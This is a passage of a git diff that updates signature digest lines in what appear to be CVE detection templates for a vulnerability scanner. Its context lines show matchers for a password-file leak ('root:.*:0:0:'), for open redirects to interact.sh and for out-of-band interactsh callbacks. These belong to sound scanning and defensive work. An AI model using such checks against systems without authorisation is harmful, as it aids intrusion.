a/http/cves/2015/CVE-2015-4050.yaml +++ b/http/cves/2015/CVE-2015-4050.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202c3ac48b45c8e7daf4c90f2a38d14a1e831a3bad62c4e3a35ba316a12e1449dc02203568e6541ba334ec9d0fd2b1fa07e30acfee5590d83fbf3070a16bef8611556a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c6ee2d1456d82be798bad563ca79b374307cc77d30e7ac1c036983b437453cc802202c3f6e8cf68dad1d6ae733a5c359cfd828355264fb11d2a7206b0ff6f74737b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4062.yaml b/http/cves/2015/CVE-2015-4062.yaml index 7b0dddc68f..c5911b8892 100644 --- a/http/cves/2015/CVE-2015-4062.yaml +++ b/http/cves/2015/CVE-2015-4062.yaml @@ -51,4 +51,4 @@ http: - 'status_code == 200' - 'contains(body_2, "newstatpress_page_nsp_search")' condition: and -# digest: 490a00463044022030aece01455698628c0529a3d758174e67fde6f23fc1fb695e84146493ec67f302200fc808dc3035d718dd2aa3b7c708133d50b93317432dce4d9a822066a41c8f22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c65258d1e76a66adc8068949f9ecc9756fd3dfad9417bbdd87faa8de11f399d702204242ecd6e110e1c675691d1c353a1a284748f2f1e585efa1996aba8970b22802:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4063.yaml b/http/cves/2015/CVE-2015-4063.yaml index 0bbd75c211..4e7a929ff0 100644 --- a/http/cves/2015/CVE-2015-4063.yaml +++ b/http/cves/2015/CVE-2015-4063.yaml @@ -49,4 +49,4 @@ http: - 'status_code_2 == 200' - "contains(body_2, '') && contains(body_2, 'newstatpress')" condition: and -# digest: 4a0a00473045022100ff2a2fd9d67da069d7ff609b34b18085e9d7711902eb1840fdbe11e1f993c5e802204050c4a0e2e0f187bf80b25980a9b9802856f47e72a347b4f3ad65a87b075d45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a6bd067fc926f7fdc0b7e097f768d1dd7b445ab01f62d900f6796fed09336895022100f4f8fd6651a39b8fd2deeceea9dd4dec89b9dfce79be8e051884961ed1f6962c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4074.yaml b/http/cves/2015/CVE-2015-4074.yaml index aef2a64789..e4a7be4398 100644 --- a/http/cves/2015/CVE-2015-4074.yaml +++ b/http/cves/2015/CVE-2015-4074.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220718e414ee98ec0a9588e6a33b625a43162976e64a7892d251b00f85ecd00fd9d022100c95d8b825c95aa25dbc8bc5c406ba494cacd398a7d7725532f1f6a57d169fc6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f5d1521fc4253526718f3778c2611a5643967696e71f8701773c96c81067cccf022050232e3067ef9bbac26247cb2c4aead41e843745ad62cc31c0938c4802f56048:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4127.yaml b/http/cves/2015/CVE-2015-4127.yaml index ce24a9383b..e81c6dc961 100644 --- a/http/cves/2015/CVE-2015-4127.yaml +++ b/http/cves/2015/CVE-2015-4127.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e76da8e16adc870ba7a317f10137034d3e92b26f856f11d5d2ca8679540fea93022100c610d4e5b9010a07031da6a78df9268f6e357f90fe4e09d7bb89a53111286aac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e2c9162878ad1a95a51dd52c00c9923c2f70e6f14607664621e90513eb90a66f022100f43f7215c6abeddce80ed06ad3dc2b786a84c3a31e46b1c415a1d3aaf5073d5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4414.yaml b/http/cves/2015/CVE-2015-4414.yaml index 71c826eed5..165dfc4f52 100644 --- a/http/cves/2015/CVE-2015-4414.yaml +++ b/http/cves/2015/CVE-2015-4414.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207ea47bc298c64d6068fa1d65374be7af86c917cae6a7cacfcdd0c23bf43f2c9f022100f615f6ae0030d1da2cff94117ceaa294906bd4088e88e6bc84bb1808e4eaba7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066c2d19e5830c8d62e01fee624030037b5c9c057cdc39bbded4c3ba801604ec90221008d4e4e0c7ebd82abbd6ffce22d6923db49b04fceeb374fb8c15e6246c16d133c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4632.yaml b/http/cves/2015/CVE-2015-4632.yaml index e0a8b9c802..fb6eb54029 100644 --- a/http/cves/2015/CVE-2015-4632.yaml +++ b/http/cves/2015/CVE-2015-4632.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206dec9027ee012d64ef15cf26caa770cc234fdcc795e13ff260ad66132172d101022100a1b9062125c40151b151fe12a44dd54587ea7a5da3b9121a6c70133865a5f45d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022074b78c5e40e1295fe435e244a30c28a5904a2558d841ec0cc46a63bdd458f91902204f23ba3f466144c0ff46332289a89ac583c84c00e44aaf5df4ecb2e49fbaf3a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4666.yaml b/http/cves/2015/CVE-2015-4666.yaml index cc93be21f1..a0781f6c9d 100644 --- a/http/cves/2015/CVE-2015-4666.yaml +++ b/http/cves/2015/CVE-2015-4666.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db47aa7c0a08b75b1e5550104d8d2c14f6e55d320c2c0f5a73f8420d27f756ae022043e23f5ba31ea828201b80d2aa25bb665a3cb3ed11df29da6bd0a071835f4e70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100890a56999748b2b724fa50e675dabf95be8dc1bd4739af2243f2b31d74beffde0221008d8347aa5f756a271eb33da1560c09c82942d68c1f0e1b34820faad2ca8b4b95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4668.yaml b/http/cves/2015/CVE-2015-4668.yaml index be4df39252..dc16cefef4 100644 --- a/http/cves/2015/CVE-2015-4668.yaml +++ b/http/cves/2015/CVE-2015-4668.yaml @@ -40,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 490a0046304402207d1ee06cb9a5b378c33cf828f2c2db24459191e7e96c95102dbc0b73a0f12d4b022058c7c74fd4b9eb32e9e3eb0c898ad084b509108bf796dfbb566d5db9a40e60af:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203700608e7e9c05fadb9435b2fed08ef12263950e9a0b8fb2455e8f90ca4144be022009cf97e6d7c584967626fe2a7daa86c4e39af62621f56fcd967508e124ea3efc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-4694.yaml b/http/cves/2015/CVE-2015-4694.yaml index 973b0f6168..e90f39ac17 100644 --- a/http/cves/2015/CVE-2015-4694.yaml +++ b/http/cves/2015/CVE-2015-4694.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201d3d5bb491de267e1c69d3486287471ff98ba98a6750ce8afa8d9e6c5fd8200e022100f503e943c4ccd85e5f04fea322f9b8c5f6fc54c559f3cebc98654dbfd0b19a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220504dad9360640320072ffdb55f8baf6e07128d30cad039027f714a609b1773db022063e30ac51930757c0ed896ca06c3dae9c7bdf12e046c23c4a2a92568a6b69984:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5354.yaml b/http/cves/2015/CVE-2015-5354.yaml index b4bb016942..bddfd7fa89 100644 --- a/http/cves/2015/CVE-2015-5354.yaml +++ b/http/cves/2015/CVE-2015-5354.yaml @@ -39,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022021c481eb46801462efe96839803d56ee55d3ed5e455993266e6a1532ad861cdd022100e3db44111b055226cbec3e71789aeccf42d280ca3c56b4ec56a0f6102a165fd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022066a468582c5f3ca43b4022e9e6f476d1e8d3be46b65f479cc02865913d76b0eb0221008e3a090f9cba13c971a9b5bc345660a5efb6c36538bf9672c834e0ecb28ae11a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5461.yaml b/http/cves/2015/CVE-2015-5461.yaml index b26657754f..6b074a9fa5 100644 --- a/http/cves/2015/CVE-2015-5461.yaml +++ b/http/cves/2015/CVE-2015-5461.yaml @@ -41,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022070f4bf5a4419a82acfda59930ff4e88eeced50aa7823f1581174d9a1803f0f55022100d7b307f0a45ad64d1a5b23b47a061774f694f29643c98688a6b811c59ecb1111:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0d008233bd874a7165e78ca4e114e64329295665fdbb33bb23ec7677e305f2c022100cd10500f285877aa27756b1b150eafd67d325e7729b04bd4ec750b42e6d52805:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5469.yaml b/http/cves/2015/CVE-2015-5469.yaml index 02a806a06d..ed985c571c 100644 --- a/http/cves/2015/CVE-2015-5469.yaml +++ b/http/cves/2015/CVE-2015-5469.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201b4c1f0713a6eed61983763feeb5802515eea5f075e23df6dfa975cf7c0ad3a10221008629f02ca4972a98232537c73de10d5be41ccc5a8dbd45c3d21fbe7885c2af00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eed2373ccb98be9dccc697f98c9a7b0ecfcd9c51d2f7177593e7adac3b70066a022074956953af87241d253fd2cf7e5251faa32e9e2bab5722ab7066f41faeb79137:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5471.yaml b/http/cves/2015/CVE-2015-5471.yaml index 18b3feef29..f1546578c4 100644 --- a/http/cves/2015/CVE-2015-5471.yaml +++ b/http/cves/2015/CVE-2015-5471.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022054adf595d4598d8079a43f04c54f567368148d6b369b91fb4dee06f3cd556691022100d43e726f5f270781a7a30857a8efb61e2683dc21642e2621602483eff03d4d0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092532f3994c79e22e29006cb7d18abc6508c2dd4296d7c145f79d3c6be45a7d1022100d7c1e5c0d6ab65fbcfb97d8273b5321ca935234ba2db1264dc0d9d44176842a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5531.yaml b/http/cves/2015/CVE-2015-5531.yaml index 772f7af1c7..52e0cd486b 100644 --- a/http/cves/2015/CVE-2015-5531.yaml +++ b/http/cves/2015/CVE-2015-5531.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 400 -# digest: 490a00463044022025dee33a28c40d6842a04f69f902866035d37b3dd71a515dc33e628a82216a31022041a3fea0ccfddf4bde198559f245fcab6faa0239b902c1233a0b3de59ee08543:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a697bae7ff915106d2930b29447107cb0f97ce9f7fde4d55d40a4ffd2d571e6022001087fa7035bcdba3779e4eaa307be3f446029fa600647277d5bc965f3ab683b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-5688.yaml b/http/cves/2015/CVE-2015-5688.yaml index 2d10c82a4b..2beade5218 100644 --- a/http/cves/2015/CVE-2015-5688.yaml +++ b/http/cves/2015/CVE-2015-5688.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205f6b6213a77637d232ed1e79782429484c6ec07861326a705ddbc57fd46e9356022100cc18e37ab04097c72550e0b40d3c694e44529a377144f3b3c611cbf071f3c505:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008752315af29e53ad5add1149a907af5f7e6aff00e83c85a518ebd76978899afb02206ffedfbd8e9a37d6b2ec474319aa66495342588fd1b5dceb25f40df80b4f7c24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6477.yaml b/http/cves/2015/CVE-2015-6477.yaml index 11d39f8497..c3d8209855 100644 --- a/http/cves/2015/CVE-2015-6477.yaml +++ b/http/cves/2015/CVE-2015-6477.yaml @@ -47,4 +47,4 @@ http: part: body words: - "" -# digest: 4a0a00473045022044eba42cf442a5583667dc633afc18523d523e9bc838b8ec07de78b9af8157c30221009a7c8b3a0d3b9b7e74be4bd27efff6532d13bb79e5d517143d2950d6e42445b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab35af454e869d001a430fb44dfdc8bfd3c7e1123abe06e8e2dd0994b32380ad0221009d756634f0f7e843ca04ab895d35370ccacd8e13e541917ff33af465e02b11fe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6544.yaml b/http/cves/2015/CVE-2015-6544.yaml index 390108d040..83e1a8981f 100644 --- a/http/cves/2015/CVE-2015-6544.yaml +++ b/http/cves/2015/CVE-2015-6544.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220310c1c3dfb4685981d2b8c0570a3f51205d1351f4525cfd108b5ff0748ce19be02204ffe64131139eccc3836198c27ddd7893e36df632591eecf10449664efd31e5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009e682bd9301f5f410c1662ce276bac306ca58e8b2702ec271f45ae17d368be8902204e71e8ef8f81a93b33cb925419b21cbc91075ea32256b968dd2eb80ca3fdabb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-6920.yaml b/http/cves/2015/CVE-2015-6920.yaml index 1f36b3e2a2..8953eceecc 100644 --- a/http/cves/2015/CVE-2015-6920.yaml +++ b/http/cves/2015/CVE-2015-6920.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b899e252863384bb6acda71963f997867f9c450792836593eeb6df45dd4b8e11022068bdf67100aac836aba363b4821bbf379dca409f6e45d4b0d518909a926874ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a6bf5b0ef6b62240d95d272a20f587e2f27dad7cf023f747d3d94cd87b6dac7202205fdb9ffe9dc85f61563f3a56c2b11e9262a0c1f7ccd56a9e195e3e584d1e8648:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7245.yaml b/http/cves/2015/CVE-2015-7245.yaml index 3565a57be4..f10a8bf761 100644 --- a/http/cves/2015/CVE-2015-7245.yaml +++ b/http/cves/2015/CVE-2015-7245.yaml @@ -41,4 +41,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 490a0046304402203abeb57842f305284c476cd3bfb05e352077b601b6e9e4f5a9eb23dc3c398a9502207caf3104651203f61f563fca8c2cadf99730190441457b4af63a1de2d4718f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220458a7cad3c6b4ad803f8dc1bc80f36ad620d43f76015e7fa38cce28953eda44b0220173b99bb23a1dd3eb087ca30bfa132fb939da097ae855f343f17678956bdffe6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7377.yaml b/http/cves/2015/CVE-2015-7377.yaml index 6fe5c9d126..747f9c2a0b 100644 --- a/http/cves/2015/CVE-2015-7377.yaml +++ b/http/cves/2015/CVE-2015-7377.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210081857604c1c23099850e1b7fa5861629a4f39915a4937ec058b69f45c97c36a40220045b828831fa6658df8f2fb9d2ea668a85595319c861368f5edef8b3813c2e2a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220582ead393110c25668e805bf8fa73acd1e2b4eee7d509b75465450e084cfd46a022072c2682ff86488bf98f57ad6907ef33c7ca06a787b2760385fa0f284d0b89123:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7450.yaml b/http/cves/2015/CVE-2015-7450.yaml index 8bce4c3ce3..7886387be2 100644 --- a/http/cves/2015/CVE-2015-7450.yaml +++ b/http/cves/2015/CVE-2015-7450.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 500 -# digest: 4a0a0047304502203dddf0bafc4daa4c2ac834309b39790c5dcb190efc315b734735e8e33cbc7a46022100e8601b832ddecb341582c7f50441a5a9d2f6431a0961563e8b8a26cdd06096a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022043bda2e3cca6dad1e25cefdadbc6785a5716b954b57ee907c1ff44af36dc24bf022100f9981c604a191bc0e8cdaae32284570e385607a15c70412723224dcc47377cb8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7780.yaml b/http/cves/2015/CVE-2015-7780.yaml index 12925cbd50..baa1fc546d 100644 --- a/http/cves/2015/CVE-2015-7780.yaml +++ b/http/cves/2015/CVE-2015-7780.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100fe814cfbdea5dd48bb42e2916cc5baef7da4bdf5e09ba2ae4aec2d64f810bf3b02206c07736bfd5e351b96f0349cbb22c014ffbe9162ed348e4e870f21ef115c3440:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022056d1293e2a5088600334ba5399e9e1451a02b29d693458d34cf67c3686abc0a00221009d858f44f32d23caf092667ae5725930fe5a56eca88157c2da43865cc861a6b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-7823.yaml b/http/cves/2015/CVE-2015-7823.yaml index 48d76a34b4..93717439ca 100644 --- a/http/cves/2015/CVE-2015-7823.yaml +++ b/http/cves/2015/CVE-2015-7823.yaml @@ -37,4 +37,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a0046304402203936d5c04ccb084917aa0e7732778dd55d5b782335998b15f96a978bba1d027b022057d23d7f269f703081b3594cca15810556c0bd1861f20f113211c56cb6019eda:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d01a3534aa6d402866973b502d959ad1da901bdab77c8c9c8e262affa8a4415c022100b1deb47d61690646c148be748eb98f0cf490c90e2e52b14edc7b5d9f5b5db2a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8349.yaml b/http/cves/2015/CVE-2015-8349.yaml index 6f98355d51..98b31b6a3e 100644 --- a/http/cves/2015/CVE-2015-8349.yaml +++ b/http/cves/2015/CVE-2015-8349.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022026a6c55a1c3ebeb2ab255f6b5b005c4fe12d2bf1e489ae7b2d7035a2acec98fb02206fa88dfe1cc100390aaff97cb554e3b4cd8f6fac1ae7e8ef68b6aa1e91eb8ba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202221a2c98f04385415848378298346003da5dea496fc3849316e42548799c83d02203e5d1bd2f80b510d83bba54a9d1d1c77a528165724578d60f6002f416604a3c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8399.yaml b/http/cves/2015/CVE-2015-8399.yaml index fdd430c95f..13ffd544e5 100644 --- a/http/cves/2015/CVE-2015-8399.yaml +++ b/http/cves/2015/CVE-2015-8399.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ea8314c2d2cfc813305b31af831f56fdab3971ec12350cbbd7dc158862e6d9b02202a754b1017d82f6c512bee0b31c7e2198a141e38147a4b5eba9341544d824a89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aaf1962ace6a0d07440478c779e8d221e625730ea77ae47dee8b740f2eb6388d02206e725088683a5b2feaacf9f6e67f331a958afd9c668e9c1c82c0b59a2b3d8901:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-8813.yaml b/http/cves/2015/CVE-2015-8813.yaml index c7cc7900d5..38a2aa3206 100644 --- a/http/cves/2015/CVE-2015-8813.yaml +++ b/http/cves/2015/CVE-2015-8813.yaml @@ -39,4 +39,4 @@ http: part: interactsh_protocol # Confirms the HTTP Interaction words: - "http" -# digest: 4b0a00483046022100d6c0f97e8ec2b3d306799b9c831fbd7e715d7bb71cafde7ed2a944c60bba1547022100d0bf5406fd6d80cacdf520983912aafba198b629392fe64d7ea723e40997d3e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201b9a9a1d440b40abea72f3d2ce58cf797cc46829680f5b04f8adf5416003f4b8022066de0c0e134493add19cfe76bcbeb380dd2b4ef901b90046b5c8d7a94e0b0ef6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2015/CVE-2015-9312.yaml b/http/cves/2015/CVE-2015-9312.yaml index d549e34492..cd705f3771 100644 --- a/http/cves/2015/CVE-2015-9312.yaml +++ b/http/cves/2015/CVE-2015-9312.yaml @@ -49,4 +49,4 @@ http: - 'contains(body_2, "([A-Za-z0-9]+)<\/span>' internal: true part: body -# digest: 490a00463044022059cdbccba12baad07ccef44d1527a3fff3edf6fbe2c982026487c98aa4541d71022064670d4c347cb92cc7115b5b6135502742f281ac0af059d0ac9090ee800de466:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c7cc586cb66af99ed6e3f51f9a9ef4b7f82cf7e7f6d976ba9be6dbf55f2fc35a022100f09767378332a0d4d3027c400640e714ffc829a2f88b2a2607a3eaa3a9f47be5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10108.yaml b/http/cves/2016/CVE-2016-10108.yaml index b831f8855a..10ee9a186a 100644 --- a/http/cves/2016/CVE-2016-10108.yaml +++ b/http/cves/2016/CVE-2016-10108.yaml @@ -44,4 +44,4 @@ http: - contains(interactsh_protocol, "dns") - status_code == 200 condition: and -# digest: 4a0a00473045022100dbaee698e438bb5ea57042639ff8c9cbcfb0f6e84dd6c329190b34561f45855c022029c504dc2b5ec6477451bb68096c7031a634878f22bc09e71a3c02150f620dc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203752d47d4a2dff2c71ec33fb417ae085f4ec6ba04e7d5c1a3bc24b2d83a45080022065b730be55f7b1f375d5a74e00518927fe01e9fb3d108c11c209db547b89981f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10134.yaml b/http/cves/2016/CVE-2016-10134.yaml index 5719763a97..39819f1888 100644 --- a/http/cves/2016/CVE-2016-10134.yaml +++ b/http/cves/2016/CVE-2016-10134.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f961836dd9c8138c996587b4274a1507a43bb914a8115c9b14ebfd61e82d7bc8022022599dbc6ce051c65a9fed1ff8126734d008bc982058429df84ecae4476e7adb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039954b35e49be328442c60b2ed93505b3975347d9aea0c49dbeaa5beeb66b17f022061f62f4e77e7fb6ad133b8ee16e71a1c4bfa0d42c63ea01579b7f2e917254431:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10367.yaml b/http/cves/2016/CVE-2016-10367.yaml index e90887e531..e7cd719b32 100644 --- a/http/cves/2016/CVE-2016-10367.yaml +++ b/http/cves/2016/CVE-2016-10367.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 404 -# digest: 4b0a00483046022100b384f35bea8369c8043e5008d6034d51fb454683d16807f8672e1b9e745a57fb022100b08cef498081b7daaae50164fbf1f9a90fc0606621467fc85d9bfd2deaf6f017:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220669cc195f0c12dd40d1327f92b141cdde1c21f5fe0e7b2c4dc135b3ea1375ebb02210096934e0a27e617f0b56355be6ffbd9735de4f925f0ea033ed28261984dd3fa42:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10368.yaml b/http/cves/2016/CVE-2016-10368.yaml index 784b4c59a7..89323a7606 100644 --- a/http/cves/2016/CVE-2016-10368.yaml +++ b/http/cves/2016/CVE-2016-10368.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 302 -# digest: 4a0a004730450221009776ba3db9cbf2e79ed4dbabfb0662340f4862132b82055252979c9fdff78bcf022020a2a76e3d3f5fc0b14ae0ba49a11bf8b41f66fb870282afcf98ee300a306def:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e8e10a3ac36f0a31c2132ee2e258ff299a47e5c03859156666c20e6af503f62802204a00192d3c856c8760cffa255580db27afc320e117342876d4314ce00a886310:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10924.yaml b/http/cves/2016/CVE-2016-10924.yaml index bb7b67d508..e3e4dc0fa5 100644 --- a/http/cves/2016/CVE-2016-10924.yaml +++ b/http/cves/2016/CVE-2016-10924.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f5e4573ee0a629024d4991c7d74d8584819a3bc1b340c6997776cd28d3116af002201f9e8bd5418f20ba3c159818d714073f0e700281290f1a794d519371336ff08f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009a47935fda9cf6e98ea3da6cdcd48edd7dbfaf293141ef9df065fcbc52155904022100e6e521ef9360d03e113ffed96af7ecaaa21db7fed09db30f9019a8ed8184e63f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10940.yaml b/http/cves/2016/CVE-2016-10940.yaml index 178218a178..ac3922d441 100644 --- a/http/cves/2016/CVE-2016-10940.yaml +++ b/http/cves/2016/CVE-2016-10940.yaml @@ -55,4 +55,4 @@ http: - 'contains(body_2, "")' - '!contains(body_3, "")' condition: and -# digest: 490a0046304402204099362396e4555f69a7d4857f74ae698a03b3a5db8e54ed829fe71f978db7b6022009679cac44f3f593de368fb42709d1018d3d4d72252df240752b4b83c148803f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009396c4707ee5cb1d4382cb8825c8ca972eef34dcb17fab9beacc2884fa13822c02202b91090164b1d59fc131daf0240a117379a719ed86b84b193bd319d1aaf5868d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10956.yaml b/http/cves/2016/CVE-2016-10956.yaml index e60f5db3a4..c9d3a43858 100644 --- a/http/cves/2016/CVE-2016-10956.yaml +++ b/http/cves/2016/CVE-2016-10956.yaml @@ -47,4 +47,4 @@ http: status: - 200 - 500 -# digest: 4b0a0048304602210090fbf657cf742c244be5eb71d3d735e6aaf25d063cc01129a2e5cfb39fff64b402210087b3728da8dcd11eb4bcde14bd79437131f078ba412cf6096f2ee6e53e7f3820:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022039d06d4aa7a538325a7def0732a690e76353bd439cec6d8585bccf59a180048002205b9232ef9dbcf11df674e2c295d9a64257cd54d42501c853019ff131e47e7741:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-10960.yaml b/http/cves/2016/CVE-2016-10960.yaml index f78a7e444c..72af05cd77 100644 --- a/http/cves/2016/CVE-2016-10960.yaml +++ b/http/cves/2016/CVE-2016-10960.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202bb949a9a1b2979e231b1722247bfaffe20ce9a18ef186b924814fd84f5ab86a0221009467ecb13104dec66e04313a27f421cf9e50ff0827a0be2ddf670ddaafa3ab72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d5801d6518bba6fcd185e6c4c2e597c904187a7581658ded906ea4fa95bf2147022100f0c0fedb63d20bf1985b5cc92014f3202fac764b514cdec0475af0b7da042744:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 